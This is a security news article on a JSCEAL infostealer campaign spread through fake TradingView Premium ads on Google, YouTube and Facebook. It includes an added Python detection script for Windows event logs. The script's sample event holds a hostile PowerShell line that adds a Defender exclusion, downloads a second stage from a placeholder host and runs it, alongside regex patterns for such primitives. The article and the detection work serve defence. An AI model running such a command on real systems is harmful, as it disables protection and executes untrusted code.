2025-09-29

Scam ads for free access to TradingView Premium have expanded from Meta ads to Google Ads and YouTube, leveraging compromised accounts to spread JSCEAL malware, Bitdefender revealed last week.

The malware campaign previously leveraged Facebook ads to redirect users to websites imitating the TradingView brand, enticing victims to install malicious files disguised as a premium version of the popular financial analysis platform, Check Point Research reported in July.

More recently, attackers have compromised other companies’ Google accounts to launch malicious Google Ad campaigns and hijack verified YouTube channels to promote their malicious links, Bitdefender discovered. Instead of directly linking to a malicious website, the ads redirect users to unlisted YouTube videos from hijacked accounts.

The YouTube profiles used in this campaign have been scrubbed of their previous content, rebranded to impersonate the official TradingView YouTube channel and made to display linked playlists from the legitimate TradingView channel on their front page, hiding the fact that they have no public videos of their own.

The videos themselves claim users can access TradingView Premium for free and direct them to click a link in the description of the YouTube video, which ultimately leads to the malware download. Bitdefender found that at least one of the unlisted videos had gained more than 182,000 views in a matter of days.

Victims of the campaign initially install a malicious downloader, installer.exe, which creates a scheduled task that adds Windows Defender exclusions and then downloads and executes the next stage, Bitdefender explained. The downloader relies on a large file size (greater than 700 MB), which puts it beyond the upload limits of many online scanners and sandboxes, and on anti-sandbox checks to avoid detection.
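The scheduled-task behaviour described above leaves a recognisable trail in Windows event logs: a Security event 4698 (a scheduled task was created) whose task XML calls Add-MpPreference and a download primitive, followed shortly by a Defender Operational event 5007 (configuration changed) naming the new exclusion. The detection logic below is an added example, not Bitdefender's tooling or anything from the campaign; the sample events are constructed to resemble those two event types, and the exact message wording of event 5007 and the field names of the export format are assumptions.

```python
"""Hunt for the installer.exe pattern: a scheduled task that registers Defender
exclusions and downloads a further stage, corroborated by Defender's own
Event ID 5007 within a short window. Added example; sample events are constructed."""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List

# A task action that registers a Defender exclusion (assumed PowerShell syntax).
EXCLUSION_RE = re.compile(r"Add-MpPreference\b.*?-Exclusion(Path|Process|Extension)", re.I)
# Common "download then run" primitives inside a task action.
DOWNLOAD_RE = re.compile(r"(Invoke-WebRequest|iwr|DownloadFile|Start-BitsTransfer|curl)", re.I)
# Event 5007's message names the registry value being set (format assumed).
EXCLUSION_REG_RE = re.compile(
    r"Windows Defender\\Exclusions\\(Paths|Processes|Extensions)\\([^\s=]+)", re.I)


@dataclass
class Event:
    time: datetime
    event_id: int
    host: str
    fields: dict


@dataclass
class Finding:
    host: str
    task_name: str
    reasons: List[str]
    excluded: List[str]


def task_command(ev: Event) -> str:
    # Event 4698 carries the task XML in TaskContent; pull Command and Arguments out of it.
    xml = ev.fields.get("TaskContent", "")
    parts = re.findall(r"<(?:Command|Arguments)>(.*?)</(?:Command|Arguments)>", xml, re.S)
    return " ".join(parts)


def find_defender_tampering(events: List[Event], window=timedelta(minutes=10)) -> List[Finding]:
    findings = []
    tasks = [e for e in events if e.event_id == 4698]
    changes = [e for e in events if e.event_id == 5007]
    for t in tasks:
        cmd = task_command(t)
        reasons = []
        if EXCLUSION_RE.search(cmd):
            reasons.append("task action registers a Defender exclusion")
        if DOWNLOAD_RE.search(cmd):
            reasons.append("task action downloads a further stage")
        if not reasons:
            continue
        # Corroborate with a Defender-side change on the same host shortly after task creation.
        excluded = []
        for c in changes:
            if c.host == t.host and t.time <= c.time <= t.time + window:
                m = EXCLUSION_REG_RE.search(c.fields.get("Message", ""))
                if m:
                    excluded.append(m.group(2))
        if excluded:
            reasons.append("Defender logged the exclusion being added (Event 5007)")
        findings.append(Finding(t.host, t.fields.get("TaskName", "?"), reasons, excluded))
    return findings


# Constructed sample events; host, task name, paths and URL are placeholders.
SAMPLE_EVENTS = [
    Event(datetime(2025, 9, 20, 14, 3, 5), 4698, "WS-07", {
        "TaskName": r"\TradingViewUpdate",
        "TaskContent": (
            "<Task><Actions><Exec><Command>powershell.exe</Command>"
            "<Arguments>-w hidden -c \"Add-MpPreference -ExclusionPath 'C:\\Users\\jdoe\\AppData\\Local\\Temp'; "
            "Invoke-WebRequest -Uri http://example.invalid/stage2 -OutFile $env:TEMP\\s2.exe; "
            "Start-Process $env:TEMP\\s2.exe\"</Arguments></Exec></Actions></Task>"),
    }),
    Event(datetime(2025, 9, 20, 14, 3, 9), 5007, "WS-07", {
        "Message": ("Microsoft Defender Antivirus Configuration has changed. New value: "
                    "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\"
                    "C:\\Users\\jdoe\\AppData\\Local\\Temp = 0x0"),
    }),
    # Benign: a backup task that neither touches Defender nor downloads anything.
    Event(datetime(2025, 9, 20, 15, 0, 0), 4698, "WS-07", {
        "TaskName": r"\NightlyBackup",
        "TaskContent": ("<Task><Actions><Exec><Command>C:\\Tools\\backup.exe</Command>"
                        "<Arguments>--full</Arguments></Exec></Actions></Task>"),
    }),
]

if __name__ == "__main__":
    for f in find_defender_tampering(SAMPLE_EVENTS):
        print(f"{f.host} {f.task_name}: {'; '.join(f.reasons)}; excluded={f.excluded}")
```

Event 4698 is only written when "Audit Other Object Access Events" is enabled, so check that policy before relying on this correlation; the 5007 leg works even without it, and an exclusion pointing at a user-writable directory such as a temp or downloads folder is worth a ticket on its own.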

The researchers noted that the malicious sites use PostHog, Facebook Pixel, Google Ads Conversion Tracking, Microsoft Ads Pixel and Adprofex to tell whether a visitor arrived by clicking an ad; visitors who did not come from an ad are redirected to benign content, a cloaking technique that makes the sites look harmless to anyone inspecting them outside the ad flow.

The next stage downloads the final payload JSCEAL, also known as WeevilProxy, which is an infostealer and spyware combo that can intercept all user network traffic, log keystrokes and take screenshots while also stealing cookie, password and cryptocurrency wallet data.

The attacker infrastructure in this campaign consists of more than 500 domains and subdomains, with thousands of Facebook pages publishing hundreds of ads daily, in addition to the handful of compromised Google accounts found by Bitdefender. In their research, the Bitdefender team also discovered emerging macOS and Android samples of the malware, which has typically targeted Windows machines.

Organizations are recommended to defend their advertising and social media accounts, including their Google and Meta accounts, YouTube channels and Facebook pages, with multi-factor authentication (MFA) and ensure they have set valid account recovery options in the event of a compromise.

Roles and permissions for social media accounts should be regularly audited to prevent unauthorized uploads or changes and monitored for unusual activity to prevent misuse that could damage brand reputation and put followers at risk.

Additionally, users should be wary of potentially malicious ads promising free access to premium services such as TradingView Premium and ensure any software downloads are only made from official vendor websites. They should also be cautious when following links in YouTube video descriptions and check a brand channel’s username and subscriber count to identify potential impersonations.